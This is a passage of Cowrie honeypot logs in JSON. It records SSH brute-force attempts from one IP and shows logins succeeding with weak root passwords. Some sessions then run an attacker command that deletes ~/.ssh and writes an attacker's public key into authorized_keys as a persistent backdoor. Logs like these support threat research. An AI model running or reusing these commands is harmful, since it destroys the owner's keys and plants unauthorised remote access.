fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:35.669414Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123..","message":"login attempt [root/zxc123..] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.050028Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"111111","message":"login attempt [webapp/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.058702Z","src_ip":"212.227.235.229","session":"da2c3974acbf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:11:36.260364Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.261260Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.262613Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.358934Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:11:36.655396Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.656116Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.753063Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.754255Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37780,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1a9d566ef4e","protocol":"ssh","message":"New connection: 212.227.235.229:37780 (1.2.3.4:22) [session: b1a9d566ef4e]","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.853597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.854289Z","src_ip":"212.227.235.229","session":"b1a9d566ef4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:36.954775Z","src_ip":"212.227.235.229","session":"b1a9d566ef4e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:37.192524Z","src_ip":"212.227.235.229","session":"da2c3974acbf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:11:37.396044Z","src_ip":"212.227.235.229","session":"b1a9d566ef4e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:38.504815Z","src_ip":"212.227.235.229","session":"b1a9d566ef4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37790,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8380df9f839","protocol":"ssh","message":"New connection: 212.227.235.229:37790 (1.2.3.4:22) [session: b8380df9f839]","sensor":"my-vps","timestamp":"2025-09-08T23:11:38.604418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:11:38.605569Z","src_ip":"212.227.235.229","session":"b8380df9f839"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:11:38.706503Z","src_ip":"212.227.235.229","session":"b8380df9f839"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:11:39.150017Z","src_ip":"212.227.235.229","session":"b8380df9f839"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:39.251075Z","src_ip":"212.227.235.229","session":"06ee3fb5281f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:39.252093Z","src_ip":"212.227.235.229","session":"b8380df9f839"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61464,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdd649593901","protocol":"ssh","message":"New connection: 217.72.205.35:61464 (1.2.3.4:22) [session: fdd649593901]","sensor":"my-vps","timestamp":"2025-09-08T23:11:49.664982Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:11:49.666120Z","src_ip":"217.72.205.35","session":"fdd649593901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49084,"dst_ip":"1.2.3.4","dst_port":22,"session":"97ff35eb8161","protocol":"ssh","message":"New connection: 212.227.235.229:49084 (1.2.3.4:22) [session: 97ff35eb8161]","sensor":"my-vps","timestamp":"2025-09-08T23:12:06.510682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:06.523453Z","src_ip":"212.227.235.229","session":"97ff35eb8161"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:06.777821Z","src_ip":"212.227.235.229","session":"97ff35eb8161"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47188,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d0a40a23099","protocol":"ssh","message":"New connection: 212.227.235.229:47188 (1.2.3.4:22) [session: 1d0a40a23099]","sensor":"my-vps","timestamp":"2025-09-08T23:12:07.601786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:07.602793Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:07.772775Z","src_ip":"212.227.235.229","session":"97ff35eb8161"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:07.905223Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:09.031839Z","src_ip":"212.227.235.229","session":"97ff35eb8161"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w","message":"login attempt [root/1q2w] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:12:09.156533Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:12:09.971907Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:12:09.972696Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:12:09.973599Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:10.282014Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:12:11.000161Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:12:11.000840Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:12:11.699261Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:11.700203Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47194,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed2385bd666c","protocol":"ssh","message":"New connection: 212.227.235.229:47194 (1.2.3.4:22) [session: ed2385bd666c]","sensor":"my-vps","timestamp":"2025-09-08T23:12:12.006828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:12.007719Z","src_ip":"212.227.235.229","session":"ed2385bd666c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:12.317124Z","src_ip":"212.227.235.229","session":"ed2385bd666c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:13.598556Z","src_ip":"212.227.235.229","session":"ed2385bd666c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:14.910228Z","src_ip":"212.227.235.229","session":"ed2385bd666c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51708,"dst_ip":"1.2.3.4","dst_port":22,"session":"54a7916ec5a9","protocol":"ssh","message":"New connection: 212.227.235.229:51708 (1.2.3.4:22) [session: 54a7916ec5a9]","sensor":"my-vps","timestamp":"2025-09-08T23:12:15.233314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:15.234041Z","src_ip":"212.227.235.229","session":"54a7916ec5a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:15.549130Z","src_ip":"212.227.235.229","session":"54a7916ec5a9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:12:17.285027Z","src_ip":"212.227.235.229","session":"54a7916ec5a9"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:17.599376Z","src_ip":"212.227.235.229","session":"1d0a40a23099"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:17.602417Z","src_ip":"212.227.235.229","session":"54a7916ec5a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45748,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3aa18b9aafb","protocol":"ssh","message":"New connection: 212.227.235.229:45748 (1.2.3.4:22) [session: c3aa18b9aafb]","sensor":"my-vps","timestamp":"2025-09-08T23:12:26.429847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:26.432912Z","src_ip":"212.227.235.229","session":"c3aa18b9aafb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2